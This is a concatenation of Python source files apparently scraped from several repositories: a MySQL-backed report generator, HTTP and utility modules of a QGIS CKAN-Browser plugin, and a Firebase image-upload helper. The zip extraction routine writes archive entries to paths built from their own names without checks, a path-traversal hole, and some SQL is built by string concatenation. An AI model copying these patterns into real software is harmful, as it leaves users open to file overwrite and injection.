## getting all the tables which are present in 'datacamp' database
cursor.execute("SHOW TABLES")
tables = cursor.fetchall()
self.D("Connected to '{}'. Found {} tables".format(self.DB, len(tables)))
return
def _load_data(self, table):
cursor = self.db.cursor()
cursor.execute('SELECT * from '+table)
data = cursor.fetchall()
cols = cursor.column_names
dct_res = {cols[i]:[x[i] for x in data] for i,c in enumerate(cols)}
return pd.DataFrame(dct_res)
def _load_sql(self, sql):
cursor = self.db.cursor()
cursor.execute(sql)
data = cursor.fetchall()
cols = cursor.column_names
dct_res = {cols[i]:[x[i] for x in data] for i,c in enumerate(cols)}
return pd.DataFrame(dct_res)
def load_data(self, table):
self.P("Loading table '{}'".format(table))
t0 = time()
df = self._load_data(table)
t_elapsed = time() - t0
self.P(" Done loading in {:.1f}s".format(t_elapsed))
return df
def _get_report_1(self, name_only=False):
"""
Past activity graph: see audit dataset line graph
Returns
-------
Full qualified path.
"""
if name_only:
return "Past activity graph"
# plt.style.use('ggplot')
sns.set()
last_days = 30
df_audit = self.load_data('audit')
df = df_audit.loc[:,['logTime', 'type','id']]
df['date'] = df.logTime.dt.floor('d')
df.drop(columns=['logTime'], inplace=True)
df_counts = df.groupby(['date','type']).count().unstack().fillna(0).unstack().reset_index().sort_values('date')
df_counts['count'] = df_counts[0]
df_counts = df_counts.loc[:,['date','type','count']]
df_counts['types'] = df_counts['type'].apply(lambda x: 'success' if x==1 else 'failure')
df_type1 = df_counts[df_counts.type == 1]
df_type2 = df_counts[df_counts.type == 2]
dates = df_type1.date.dt.strftime('%Y-%m-%d').tolist()
# vals1 = df_type1[0].values
# vals2 = df_type2[0].values
plt.figure(figsize=(13,8))
x = list(range(0, last_days))[:len(dates)]
# _len = len(x)
# y1 = vals1[-_len:]
# y2 = vals2[-_len:]
# plt.bar(x, y1, label='successes')
# plt.bar(x, y2, label='failures')
# plt.xlabel('Days', fontsize=18)
# plt.ylabel('Count of actions', fontsize=18)
ax = sns.barplot(x='date', hue='types', y='count', data=df_counts)
plt.xticks(x, dates)
plt.title('Last {} days activity history ({:%Y-%m-%d %H:%M})'.format(
last_days, datetime.now()), fontsize=30)
plt.legend(title='Activity type')
for p in ax.patches:
ax.annotate(
"%.2f" % p.get_height(),
(p.get_x() + p.get_width() / 2., p.get_height()),
ha='center', va='center', fontsize=11, color='gray', rotation=90,
xytext=(0, 20),textcoords='offset points'
)
return
def _get_report_2(self, name_only=False):
"""
Pie/Bar report with number of tenders for each tag
Returns
-------
Full qualified path.
"""
if name_only:
return "Tenders per tag"
sql = (
"SELECT COUNT(project_id) cnt, tag FROM " +
" (SELECT tags.project_id, tags.keyword_id, keywords.value tag" +
" FROM tags, keywords WHERE tags.keyword_id=keywords.id) subq" +
" GROUP BY tag")
df = self._load_sql(sql)
df = df.set_index('tag')
sns.set()
df.plot.pie(y='cnt', figsize=(21,18))
plt.title('Density of tags in projects ({:%Y-%m-%d %H:%M})'.format(
datetime.now()), fontsize=30)
plt.legend(
ncol=5,
loc='lower center',
bbox_to_anchor=(0., -0.2, 1., .102),
title='Type of project property (tag)')
# plt.subplots_adjust(left=0.1, bottom=-2.1, right=0.75)
return
def _get_report_3(self, name_only=False):
"""
Number of bids aggregated at week-day level
Returns
-------
Full qualified path.
"""
if name_only:
return "Bids and values"
df = self._load_sql('SELECT COUNT(*) cnt, SUM(price) vals, DATE(created_at) dt FROM bids GROUP BY dt')
assert df.shape[0] > 0, "SQL error in table `bids`"
df = df.sort_values('dt')
vals = df['vals'].fillna(0).values
plt.figure(figsize=(13,8))
ax = sns.barplot(x='dt', y='cnt', data=df)
plt.title('Bids per day with overall values ({:%Y-%m-%d %H:%M})'.format(
datetime.now()), fontsize=30)
plt.xlabel('Date of the bids', fontsize=18)
plt.ylabel('Number of bids', fontsize=18)
for i, p in enumerate(ax.patches):
ax.annotate(
"{:,.1f} lei".format(vals[i]),
(p.get_x() + p.get_width() / 2., p.get_height()),
ha='left', va='top', fontsize=12, color='black', rotation=90,
xytext=(0, 10),textcoords='offset points'
)
return
def get_avail_reports(self):
max_rep = 100
avail = {}
for i in range(max_rep+1):
if hasattr(self, self._rep_base + str(i)):
fnc = getattr(self, self._rep_base + str(i))
avail[i] = fnc(True)
return avail
def get_report(self, report_id, png_mode='base64', force_save=False):
if type(report_id) == str:
report_id = int(report_id)
assert png_mode in ['path', 'base64'], "Unknown png_mode '{}'".format(png_mode)
avails = self.get_avail_reports()
if report_id not in avails:
self.P("ERROR: must supply a valid report number {}".format(avails))
return None
self.P("Generating report {} - '{}'".format(report_id, avails[report_id]))
rep_name = '_get_report_'+str(report_id)
rep_fun = getattr(self, rep_name)
rep_fun()
if png_mode == 'path' or force_save:
path = self._save_png(report_id)
if png_mode == 'path':
return path
else:
return self.log.plt_to_base64(plt)
def _save_png(self, report_id):
fn = self.log.save_plot(plt, label='REP_{:02d}'.format(report_id))
plt.close()
return fn
def shutdown(self):
self.db.close()
self.P("Data connection closed.")
if __name__ == '__main__':
l = Logger("TRR", config_file='config/config.txt')
eng = RepEngine(DEBUG=True, log=l)
l.P(eng.get_avail_reports())
simg = eng.get_report('3', png_mode='path')
l.P(simg)
# eng.shutdown()
``` |
{
"source": "4estone/QGIS-CKAN-Browser",
"score": 2
} |
#### File: QGIS-CKAN-Browser/CKAN-Browser/httpcall.py
```python
import inspect
from urllib.parse import unquote
from PyQt5.QtCore import QEventLoop
from PyQt5.QtCore import QUrl
from PyQt5.QtNetwork import QNetworkReply
from PyQt5.QtNetwork import QNetworkRequest
from qgis.core import QgsApplication
from qgis.core import QgsNetworkAccessManager
from .settings import Settings
from .util import Util
class RequestsException(Exception):
pass
class RequestsExceptionTimeout(RequestsException):
pass
class RequestsExceptionConnectionError(RequestsException):
pass
class RequestsExceptionUserAbort(RequestsException):
pass
class HttpCall:
"""
Wrapper around gsNetworkAccessManager and QgsAuthManager to make HTTP calls.
"""
def __init__(self, settings, util):
assert isinstance(settings, Settings)
assert isinstance(util, Util)
self.settings = settings
self.util = util
self.reply = None
def execute_request(self, url, **kwargs):
"""
Uses QgsNetworkAccessManager and QgsAuthManager.
"""
method = kwargs.get('http_method', 'get')
headers = kwargs.get('headers', {})
# This fixes a weird error with compressed content not being correctly
# inflated.
# If you set the header on the QNetworkRequest you are basically telling
# QNetworkAccessManager "I know what I'm doing, please don't do any content
# encoding processing".
# See: https://bugs.webkit.org/show_bug.cgi?id=63696#c1
try:
del headers[b'Accept-Encoding']
except KeyError as ke:
# only debugging here as after 1st remove it isn't there anymore
self.util.msg_log_debug(u'unexpected error deleting request header: {}'.format(ke))
pass
# Avoid double quoting form QUrl
url = unquote(url)
self.util.msg_log_debug(u'http_call request: {} {}'.format(method, url))
class Response:
status_code = 200
status_message = 'OK'
text = ''
ok = True
headers = {}
reason = ''
exception = None
def iter_content(self, _):
return [self.text]
self.http_call_result = Response()
url = self.util.remove_newline(url)
req = QNetworkRequest()
req.setUrl(QUrl(url))
req.setAttribute(QNetworkRequest.FollowRedirectsAttribute, True)
for k, v in headers.items():
self.util.msg_log_debug("%s: %s" % (k, v))
try:
req.setRawHeader(k, v)
except:
self.util.msg_log_error(u'FAILED to set header: {} => {}'.format(k, v))
self.util.msg_log_last_exception()
if self.settings.authcfg:
self.util.msg_log_debug(u'before updateNetworkRequest')
QgsApplication.authManager().updateNetworkRequest(req, self.settings.authcfg)
self.util.msg_log_debug(u'before updateNetworkRequest')
if self.reply is not None and self.reply.isRunning():
self.reply.close()
self.util.msg_log_debug(u'getting QgsNetworkAccessManager.instance()')
#func = getattr(QgsNetworkAccessManager.instance(), method)
#func = QgsNetworkAccessManager().get(req)
#manager = QNetworkAccessManager()
#event = QEventLoop()
#response = manager.get(QNetworkRequest(QUrl(url)))
#response.downloadProgress.connect(self.download_progress)
#response.finished.connect(event.quit)
#event.exec()
#response_msg = response.readAll()
##response_msg = str(response_msg)
#response_msg = str(response_msg, encoding='utf-8')
##response_msg = response_msg.decode('utf-8')
#response.deleteLater()
#self.util.msg_log_debug(u'response message:\n{} ...'.format(response_msg[:255]))
#self.http_call_result.text = response_msg # in Python3 all strings are unicode, so QString is not defined
#return self.http_call_result
# Calling the server ...
self.util.msg_log_debug('before self.reply = func(req)')
#self.reply = func(req)
#self.reply = QgsNetworkAccessManager.instance().get(req)
method_call = getattr(QgsNetworkAccessManager.instance(), method)
self.reply = method_call(req)
#self.reply.setReadBufferSize(1024*1024*1024)
#self.reply.setReadBufferSize(1024 * 1024 * 1024 * 1024)
self.reply.setReadBufferSize(0)
self.util.msg_log_debug('after self.reply = func(req)')
# Let's log the whole call for debugging purposes:
if self.settings.debug:
self.util.msg_log_debug("\nSending %s request to %s" % (method.upper(), req.url().toString()))
headers = {str(h): str(req.rawHeader(h)) for h in req.rawHeaderList()}
for k, v in headers.items():
try:
self.util.msg_log_debug("%s: %s" % (k, v))
except:
self.util.msg_log_debug('error logging headers')
if self.settings.authcfg:
self.util.msg_log_debug("update reply w/ authcfg: {0}".format(self.settings.authcfg))
QgsApplication.authManager().updateNetworkReply(self.reply, self.settings.authcfg)
self.util.msg_log_debug('before connecting to events')
# connect downloadProgress event
try:
self.reply.downloadProgress.connect(self.download_progress)
#pass
except:
self.util.msg_log_error('error connecting "downloadProgress" event')
self.util.msg_log_last_exception()
# connect reply finished event
try:
self.reply.finished.connect(self.reply_finished)
#pass
except:
self.util.msg_log_error('error connecting reply "finished" progress event')
self.util.msg_log_last_exception()
self.util.msg_log_debug('after connecting to events')
# Call and block
self.event_loop = QEventLoop()
try:
self.reply.finished.connect(self.event_loop.quit)
except:
self.util.msg_log_error('error connecting reply "finished" progress event to event loop quit')
self.util.msg_log_last_exception()
self.mb_downloaded = 0
# Catch all exceptions (and clean up requests)
self.event_loop.exec()
# Let's log the whole response for debugging purposes:
if self.settings.debug:
self.util.msg_log_debug(
u'\nGot response [{}/{}] ({} bytes) from:\n{}\nexception:{}'.format(
self.http_call_result.status_code,
self.http_call_result.status_message,
len(self.http_call_result.text),
self.reply.url().toString(),
self.http_call_result.exception
)
)
headers = {str(h): str(self.reply.rawHeader(h)) for h in self.reply.rawHeaderList()}
for k, v in headers.items():
self.util.msg_log_debug("%s: %s" % (k, v))
self.util.msg_log_debug("Payload :\n%s ......" % self.http_call_result.text[:255])
self.reply.close()
self.util.msg_log_debug("Deleting reply ...")
try:
self.reply.deleteLater()
except:
self.util.msg_log_error('unexpected error deleting QNetworkReply')
self.util.msg_log_last_exception()
self.reply = None
if self.http_call_result.exception is not None:
self.util.msg_log_error('http_call_result.exception is not None')
self.http_call_result.ok = False
# raise self.http_call_result.exception
return self.http_call_result
def download_progress(self, bytes_received, bytes_total):
mb_received = bytes_received / (1024 * 1024)
if mb_received - self.mb_downloaded >= 1:
self.mb_downloaded = mb_received
self.util.msg_log_debug(
u'downloadProgress {:.1f} of {:.1f} MB" '
.format(mb_received, bytes_total / (1024 * 1024))
)
def reply_finished(self):
self.util.msg_log_debug('------- reply_finished')
try:
err = self.reply.error()
httpStatus = self.reply.attribute(QNetworkRequest.HttpStatusCodeAttribute)
httpStatusMessage = self.reply.attribute(QNetworkRequest.HttpReasonPhraseAttribute)
self.http_call_result.status_code = httpStatus
self.http_call_result.status_message = httpStatusMessage
for k, v in self.reply.rawHeaderPairs():
self.http_call_result.headers[k.data().decode()] = v.data().decode()
self.http_call_result.headers[k.data().decode().lower()] = v.data().decode()
if err == QNetworkReply.NoError:
self.util.msg_log_debug('QNetworkReply.NoError')
self.http_call_result.text = self.reply.readAll()
self.http_call_result.ok = True
else:
self.util.msg_log_error('QNetworkReply Error')
self.http_call_result.ok = False
msg = "Network error #{0}: {1}"\
.format(
self.reply.error(),
self.reply.errorString()
)
self.http_call_result.reason = msg
self.util.msg_log_error(msg)
if err == QNetworkReply.TimeoutError:
self.http_call_result.exception = RequestsExceptionTimeout(msg)
if err == QNetworkReply.ConnectionRefusedError:
self.http_call_result.exception = RequestsExceptionConnectionError(msg)
else:
self.http_call_result.exception = Exception(msg)
except:
self.util.msg_log_error(u'unexpected error in {}'.format(inspect.stack()[0][3]))
self.util.msg_log_last_exception()
```
#### File: QGIS-CKAN-Browser/CKAN-Browser/util.py
```python
import errno
import os
from fnmatch import filter
import shutil
import subprocess
import sys
import zipfile
import json
from PyQt5.QtCore import \
QCoreApplication, \
QDateTime, \
QDir, \
QFile, \
QFileInfo, \
QIODevice, \
QObject, \
QSettings, \
QUrl, \
QUrlQuery
#SIGNAL, \
#SLOT
from PyQt5.QtWidgets import QMessageBox
from PyQt5.QtXml import QDomNode, QDomElement, QDomDocument, QDomNodeList
from qgis.core import QgsMessageLog, QgsVectorLayer, QgsRasterLayer, QgsProviderRegistry
from qgis.core import QgsLayerTreeGroup, QgsProject
from qgis.core import QgsMapLayer
from qgis.core import Qgis
from qgis.utils import iface
class Util:
def __init__(self, settings, main_win):
self.main_win = main_win
self.dlg_caption = settings.DLG_CAPTION
self.settings = settings
# Moved from ckan_browser.py
# noinspection PyMethodMayBeStatic
def tr(self, message):
"""Get the translation for a string using Qt translation API.
We implement this ourselves since we do not inherit QObject.
:param message: String for translation.
:type message: str, QString
:returns: Translated version of message.
:rtype: QString
"""
# noinspection PyTypeChecker,PyArgumentList,PyCallByClass
#return QCoreApplication.translate('CKANBrowser', message, None)
return QCoreApplication.translate('self.util', message, None)
def create_dir(self, dir_path):
if not os.path.exists(dir_path):
try:
os.makedirs(dir_path)
except OSError as ose:
if ose.errno != errno.EEXIST:
return False
return True
def check_dir(self, dir_path):
if (
dir_path is None or
dir_path.isspace() or
dir_path == ''
):
return False
if os.path.isdir(dir_path):
# TODO check write permissions
return True
return self.create_dir(dir_path)
def check_api_url(self, api_url):
if(
not api_url or
api_url is None or
api_url.isspace() or
api_url == ''
):
return False
else:
return True
def extract_zip(self, archive, dest_dir):
try:
# zf.extractall(dest_dir) fails for umlauts
# https://github.com/joeferraro/MavensMate/pull/27/files
f = zipfile.ZipFile(archive, 'r')
self.msg_log_debug(u'dest_dir: {0}'.format(dest_dir))
for file_info in f.infolist():
#file_name = os.path.join(dest_dir, file_info.filename.decode('utf8'))
#decode('utf8') fails on Windows with umlauts in filenames
file_name = os.path.join(dest_dir, file_info.filename)
# different types of ZIPs
# some have a dedicated entry for folders
if file_name[-1] == u'/':
if not os.path.exists(file_name):
os.makedirs(file_name)
continue
# some don't hava dedicated entry for folder
# extract folder info from file name
extract_dir = os.path.dirname(file_name)
if not os.path.exists(extract_dir):
os.makedirs((extract_dir))
out_file = open(file_name, 'wb')
shutil.copyfileobj(f.open(file_info.filename), out_file)
return True, None
except UnicodeDecodeError as ude:
return False, u'UnicodeDecodeError: {0}'.format(ude)
except AttributeError as ae:
return False, u'AttributeError: {0}'.format(ae)
except:
self.msg_log_debug(u'Except: {0}'.format(sys.exc_info()[1]))
return False, u'Except: {0}'.format(sys.exc_info()[1])
def add_lyrs_from_dir(self, data_dir, layer_name, layer_url):
try:
file_types = (
'*.[Ss][Hh][Pp]',
'*.[Gg][Mm][Ll]',
'*.[Gg][Ee][Oo][Rr][Ss][Ss]',
'*.[Xx][Mm][Ll]',
'*.[Cc][Ss][Vv]',
'*.[Tt][Xx][Tt]',
'*.[Pp][Dd][Ff]',
'*.[Tt][Ii][Ff]',
'*.[Tt][Ii][Ff][Ff]',
'*.[Aa][Ss][Cc]',
'*.[Qq][Ll][Rr]',
'*.[Ii][Mm][Gg]',
'*.[Jj][2][Kk]',
'*.[Jj][Pp][2]',
'*.[Rr][Ss][Tt]',
'*.[Dd][Ee][Mm]',
'*.[Ww][Mm][Tt][Ss]',
'*.[Ww][Mm][Ss]',
'*.[Ww][Ff][Ss]',
'*.[Kk][Mm][Ll]',
'*.[Xx][Ll][Ss]',
'*.[Xx][Ll][Ss][Xx]',
'*.[Dd][Oo][Cc]',
'*.[Dd][Oo][Cc][Xx]',
'*.[Jj][Pp][Gg]',
'*.[Jj][Pp][Ee][Gg]',
'*.[Pp][Nn][Gg]',
'*.*[Jj][Ss][Oo][Nn]'
)
geo_files = []
for file_type in file_types:
### python 3.5
# glob_term = os.path.join(data_dir, '**', file_type)
# geo_files.extend(glob.glob(glob_term))
### python > 2.2
for root, dir_names, file_names in os.walk(data_dir):
for file_name in filter(file_names, file_type):
geo_files.append(os.path.join(root, file_name))
self.msg_log_debug(u'add lyrs: {0}'.format(data_dir))
self.msg_log_debug(u'add lyrs: {0}'.format('\n'.join(geo_files)))
if len(geo_files) < 1:
self.msg_log_debug('len(geo_files)<1')
# return False, u'Keine anzeigbaren Daten gefunden in\n{0}.\n\n\n ===----!!!TODO!!!----===\n\nBenutzer anbieten Verzeichnis zu öffnen'.format(dir)
return False, {"message": "unknown fileytpe", "dir_path": data_dir}
for geo_file in geo_files:
if os.path.basename(geo_file).lower().endswith('.shp.xml'):
self.msg_log_debug(u'skipping {0}'.format(geo_file))
continue
self.msg_log_debug(geo_file)
full_path = os.path.join(data_dir, geo_file)
full_layer_name = layer_name + ' - ' + os.path.basename(geo_file)
low_case = os.path.basename(geo_file).lower()
lyr = None
if low_case.endswith('json'):
self.msg_log_debug(u'Open JSON')
if False is self.__is_geojson(full_path):
if self.__open_with_system(full_path) > 0:
if QMessageBox.Yes == self.dlg_yes_no(self.tr(u'py_dlg_base_open_manager').format(layer_url)):
self.open_in_manager(data_dir)
continue
if(
low_case.endswith('.txt') or
low_case.endswith('.pdf') or
low_case.endswith('.xls') or
low_case.endswith('.xlsx') or
low_case.endswith('.doc') or
low_case.endswith('.docx') or
low_case.endswith('.jpg') or
low_case.endswith('.jpeg') or
low_case.endswith('.png')
):
if self.__open_with_system(full_path) > 0:
if QMessageBox.Yes == self.dlg_yes_no(self.tr(u'py_dlg_base_open_manager').format(layer_url)):
self.open_in_manager(data_dir)
continue
elif low_case.endswith('.qlr'):
lyr = self.__add_layer_definition_file(
full_path,
QgsProject.instance().layerTreeRoot()
)
elif low_case.endswith('.wmts') or low_case.endswith('.wms'): # for now, we assume it's a WMTS
self.msg_log_debug(u'Open WM(T)S')
self._open_wmts(layer_name, layer_url)
continue
elif low_case.endswith('.wfs'): # for now, we assume it's a WMTS
self.msg_log_debug(u'Open WFS')
self._open_wfs(layer_name, layer_url)
continue
elif low_case.endswith('.csv'):
# lyr = self.__add_csv_table(full_path, full_layer_name)
self.msg_log_debug(u'Open CSV')
self._open_csv(full_path)
continue
elif(
low_case.endswith('.asc') or
low_case.endswith('.tif') or
low_case.endswith('.tiff') or
low_case.endswith('.img') or
low_case.endswith('.jp2') or
low_case.endswith('.j2k') or
low_case.endswith('.rst') or
low_case.endswith('.dem')
):
lyr = self.__add_raster_layer(full_path, full_layer_name)
else:
lyr = self.__add_vector_layer(full_path, full_layer_name)
if lyr is not None:
if not lyr.isValid():
self.msg_log_debug(u'not valid: {0}'.format(full_path))
if QMessageBox.Yes == self.dlg_yes_no(self.tr(u'py_dlg_base_open_manager').format(layer_url)):
self.open_in_manager(data_dir)
continue
QgsProject.instance().addMapLayer(lyr)
else:
self.msg_log_debug(u'could not add layer: {0}'.format(full_path))
return True, None
except AttributeError as ae:
return False, u'AttributeError: {}'.format(ae)
except TypeError as te:
return False, u'TypeError: {}'.format(te)
except:
return False, sys.exc_info()[0]
def __add_vector_layer(self, file_name, full_layer_name):
self.msg_log_debug(u'vector layer'.format(file_name))
lyr = QgsVectorLayer(
file_name,
full_layer_name,
'ogr'
)
return lyr
def __add_raster_layer(self, file_name, full_layer_name):
self.msg_log_debug(u'raster layer'.format(file_name))
lyr = QgsRasterLayer(
file_name,
full_layer_name
)
return lyr
def __add_csv_table(self, file_name, full_layer_name):
self.msg_log_debug(u'csv layer'.format(file_name))
# file:///f:/scripts/map/points.csv?delimiter=%s&
# file:///home/bergw/open-data-ktn-cache-dir/42b67af7-f795-48af-9de0-25c8d777bb50/d5ea898b-2ee7-4b52-9b7d-412826d73e45/schuler-und-klassen-kaernten-gesamt-sj-2014-15.csv?encoding=ISO-8859-1&type=csv&delimiter=;&geomType=none&subsetIndex=no&watchFile=no
# file:///C:/Users/bergw/_TEMP/open-data-ktn-cache-2/wohnbevgemeinzeljahre-2014-WINDOWS.csv?encoding=windows-1252&type=csv&delimiter=%5Ct;&geomType=none&subsetIndex=no&watchFile=no
slashes = '//'
if os.name == 'nt':
slashes += '/'
lyr_src = u'file:{0}{1}?encoding=ISO-8859-1&type=csv&delimiter=;&geomType=none&subsetIndex=no&watchFile=no'.format(
slashes,
file_name
)
lyr = QgsVectorLayer(
lyr_src,
full_layer_name,
'delimitedtext'
)
return lyr
def __add_layer_definition_file(self, file_name, root_group):
"""
shamelessly copied from
https://github.com/qgis/QGIS/blob/master/src/core/qgslayerdefinition.cpp
"""
qfile = QFile(file_name)
if not qfile.open(QIODevice.ReadOnly):
return None
doc = QDomDocument()
if not doc.setContent(qfile):
return None
file_info = QFileInfo(qfile)
QDir.setCurrent(file_info.absoluteDir().path())
root = QgsLayerTreeGroup()
ids = doc.elementsByTagName('id')
for i in range(0, ids.size()):
id_node = ids.at(i)
id_elem = id_node.toElement()
old_id = id_elem.text()
layer_name = old_id[:-17]
date_time = QDateTime.currentDateTime()
new_id = layer_name + date_time.toString('yyyyMMddhhmmsszzz')
id_elem.firstChild().setNodeValue(new_id)
tree_layer_nodes = doc.elementsByTagName('layer-tree-layer')
for j in range(0, tree_layer_nodes.count()):
layer_node = tree_layer_nodes.at(j)
layer_elem = layer_node.toElement()
if old_id == layer_elem.attribute('id'):
layer_node.toElement().setAttribute('id', new_id)
layer_tree_elem = doc.documentElement().firstChildElement('layer-tree-group')
load_in_legend = True
if not layer_tree_elem.isNull():
root.readChildrenFromXML(layer_tree_elem)
load_in_legend = False
layers = QgsMapLayer.fromLayerDefinition(doc)
QgsProject.instance().addMapLayers(layers, load_in_legend)
nodes = root.children()
for node in nodes:
root.takeChild(node)
del root
root_group.insertChildNodes(-1, nodes)
return None
def _open_wmts(self, name, capabilites_url):
# Add new HTTPConnection like in source
# https://github.com/qgis/QGIS/blob/master/src/gui/qgsnewhttpconnection.cpp
self.msg_log_debug(u'add WM(T)S: Name = {0}, URL = {1}'.format(name, capabilites_url))
s = QSettings()
s.setValue(u'qgis/WMS/{0}/password'.format(name), '')
s.setValue(u'qgis/WMS/{0}/username'.format(name), '')
s.setValue(u'qgis/WMS/{0}/authcfg'.format(name), '')
s.setValue(u'qgis/connections-wms/{0}/dpiMode'.format(name), 7) # refer to https://github.com/qgis/QGIS/blob/master/src/gui/qgsnewhttpconnection.cpp#L229-L247
s.setValue(u'qgis/connections-wms/{0}/ignoreAxisOrientation'.format(name), False)
s.setValue(u'qgis/connections-wms/{0}/ignoreGetFeatureInfoURI'.format(name), False)
s.setValue(u'qgis/connections-wms/{0}/ignoreGetMapURI'.format(name), False)
s.setValue(u'qgis/connections-wms/{0}/invertAxisOrientation'.format(name), False)
s.setValue(u'qgis/connections-wms/{0}/referer'.format(name), '')
s.setValue(u'qgis/connections-wms/{0}/smoothPixmapTransform'.format(name), False)
s.setValue(u'qgis/connections-wms/{0}/url'.format(name), capabilites_url)
s.setValue(u'qgis/connections-wms/selected', name)
if self.settings.auth_propagate and self.settings.authcfg:
s.setValue(u'qgis/WMS/{0}/authcfg'.format(name), self.settings.authcfg)
# create new dialog
wms_dlg = QgsProviderRegistry.instance().createSelectionWidget("wms", self.main_win)
wms_dlg.addRasterLayer.connect(iface.addRasterLayer)
wms_dlg.show()
def _open_wfs(self, name, capabilites_url):
# Add new HTTPConnection like in source
# https://github.com/qgis/QGIS/blob/master/src/gui/qgsnewhttpconnection.cpp
# https://github.com/qgis/QGIS/blob/79616fd8d8285b4eb93adafdfcb97a3e429b832e/src/app/qgisapp.cpp#L3783
self.msg_log_debug(u'add WFS: Name={0}, original URL={1}'.format(name, capabilites_url))
# remove additional url parameters, otherwise adding wfs works the frist time only
# https://github.com/qgis/QGIS/blob/9eee12111567a84f4d4de7e020392b3c01c28598/src/gui/qgsnewhttpconnection.cpp#L199-L214
url = QUrl(capabilites_url)
query_string = url.query()
if query_string:
query_string = QUrlQuery(query_string)
query_string.removeQueryItem('SERVICE')
query_string.removeQueryItem('REQUEST')
query_string.removeQueryItem('FORMAT')
query_string.removeQueryItem('service')
query_string.removeQueryItem('request')
query_string.removeQueryItem('format')
#also remove VERSION: shouldn't be necessary, but QGIS sometimes seems to append version=1.0.0
query_string.removeQueryItem('VERSION')
query_string.removeQueryItem('version')
url.setQuery(query_string)
capabilites_url = url.toString()
self.msg_log_debug(u'add WFS: Name={0}, base URL={1}'.format(name, capabilites_url))
s = QSettings()
self.msg_log_debug(u'existing WFS url: {0}'.format(s.value(u'qgis/connections-wfs/{0}/url'.format(name), '')))
key_user = u'qgis/WFS/{0}/username'.format(name)
key_pwd = u'qgis/WFS/{0}/password'.format(name)
key_referer = u'qgis/connections-wfs/{0}/referer'.format(name)
key_url = u'qgis/connections-wfs/{0}/url'.format(name)
key_authcfg = u'qgis/WFS/{0}/authcfg'.format(name)
s.remove(key_user)
s.remove(key_pwd)
s.remove(key_referer)
s.remove(key_url)
s.sync()
s.setValue(key_user, '')
s.setValue(key_pwd, '')
s.setValue(key_referer, '')
s.setValue(key_url, capabilites_url)
if self.settings.auth_propagate and self.settings.authcfg:
s.setValue(key_authcfg, self.settings.authcfg)
s.setValue(u'qgis/connections-wfs/selected', name)
# create new dialog
wfs_dlg = QgsProviderRegistry.instance().selectWidget("WFS", self.main_win)
wfs_dlg = QgsProviderRegistry.instance().createSelectionWidget("WFS", self.main_win)
wfs_dlg.addVectorLayer.connect(lambda url: iface.addVectorLayer(url, name, "WFS"))
wfs_dlg.show()
def _open_csv(self, full_path):
# Add new HTTPConnection like in source
# https://github.com/qgis/QGIS/blob/master/src/gui/qgsnewhttpconnection.cpp
self.msg_log_debug(u'add CSV file: {0}'.format(full_path))
name = os.path.basename(full_path)
# create new dialog
csv_dlg = QgsProviderRegistry.instance().createSelectionWidget("delimitedtext", self.main_win)
csv_dlg.addVectorLayer.connect(lambda url: iface.addVectorLayer(url, name, "delimitedtext"))
csv_dlg.children()[1].children()[2].setFilePath(full_path)
csv_dlg.show()
def __open_with_system(self, file_name):
code = None
if sys.platform.startswith('darwin'):
code = subprocess.call(('open', file_name))
elif os.name == 'nt':
win_code = os.startfile(file_name)
if win_code != 0:
code = -1
elif os.name == 'posix':
code = subprocess.call(('xdg-open', file_name))
self.msg_log_debug(u'Exit Code: {0}'.format(code))
return code
def __is_geojson(self, file_path):
try:
with open(file_path) as json_file:
data = json.load(json_file)
if data.get('features') is not None:
self.msg_log_debug('is_geojson: "features" found')
return True
elif data.get('type') =="FeatureCollection":
self.msg_log_debug('is_geojson: "FeatureCollection" found')
return True
else:
return False
except:
self.msg_log_debug(u'Error reading json'.format(sys.exc_info()[1]))
return False
def dlg_information(self, msg):
QMessageBox.information(self.main_win, self.dlg_caption, msg)
def dlg_warning(self, msg):
QMessageBox.warning(self.main_win, self.dlg_caption, msg)
def dlg_yes_no(self, msg):
return QMessageBox.question(
self.main_win,
self.dlg_caption,
msg,
QMessageBox.Yes,
QMessageBox.No
)
def msg_log_debug(self, msg):
if self.settings.debug is True:
QgsMessageLog.logMessage(msg, self.dlg_caption, Qgis.Info)
def msg_log_warning(self, msg):
QgsMessageLog.logMessage(msg, self.dlg_caption, Qgis.Warning)
def msg_log_error(self, msg):
QgsMessageLog.logMessage(msg, self.dlg_caption, Qgis.Critical)
def msg_log_last_exception(self):
exc_type, exc_value, exc_traceback = sys.exc_info()
self.msg_log_error(
u'\nexc_type: {}\nexc_value: {}\nexc_traceback: {}'
.format(exc_type, exc_value, exc_traceback)
)
def remove_newline(self, url):
if '\r\n' in url:
self.msg_log_debug(u'Windows style new line found in resource url')
url = url.replace('\r\n', '')
if '\n' in url:
self.msg_log_debug(u'Linux style new line found in resource url')
url = url.replace('\n', '')
return url
def resolve(self, name, base_path=None):
"""http://gis.stackexchange.com/a/130031/8673"""
if not base_path:
base_path = os.path.dirname(os.path.realpath(__file__))
return os.path.join(base_path, name)
def open_in_manager(self, file_path):
"""http://stackoverflow.com/a/6631329/1504487"""
self.msg_log_debug(
u'open_in_manager, os.name: {} platform: {}\npath: {}'
.format(os.name, sys.platform, file_path)
)
if sys.platform == 'darwin':
subprocess.Popen(['open', file_path])
elif sys.platform == 'linux' or sys.platform == 'linux2':
subprocess.Popen(['xdg-open', file_path])
elif os.name == 'nt' or sys.platform == 'win32':
file_path = os.path.normpath(file_path)
self.msg_log_debug(u'normalized path: {}'.format(file_path))
subprocess.Popen(['explorer', file_path])
def str2bool(self, v):
"""http://stackoverflow.com/a/715468/1504487"""
return v.lower() in ("yes", "true", "t", "1")
``` |
{
"source": "4evernaive/YOLOv3Tiny_Face_Mask",
"score": 3
} |
#### File: 4evernaive/YOLOv3Tiny_Face_Mask/store_image.py
```python
import cv2.cv2 as cv2
import firebase_admin
from firebase_admin import credentials
from firebase_admin import storage
import numpy
import base64
cred = credentials.Certificate("serviceAccountKey.json")
firebase_admin.initialize_app(cred,{'storageBucket': 'chatbot-108aea001-296006.appspot.com'})
def storeImage(image, uuid):#frame,id
print('[INFO] Run <storeImage> function now.')
#img = cv2.cvtColor(numpy.asarray(integrationModel.frame["image"]),cv2.COLOR_RGB2BGR)
img = image
img = base64.b64encode(cv2.imencode('.png', img)[1]).decode()
bucket = storage.bucket()
img = base64.b64decode(img)
blob = bucket.blob('image/' +"nomask-"+uuid+'.png')
blob.upload_from_string(img)
frameUrl = blob.public_url
blob.make_public()
print("[INFO] Image has been uploaded to Firebase Storage\n[LINK] "+frameUrl)
return frameUrl
``` |
{
"source": "4everzyj/tensorflow-yolov3",
"score": 2
} |
#### File: tensorflow-yolov3/dev/ckpt_loader.py
```python
import tensorflow as tf
import time
def save_graph():
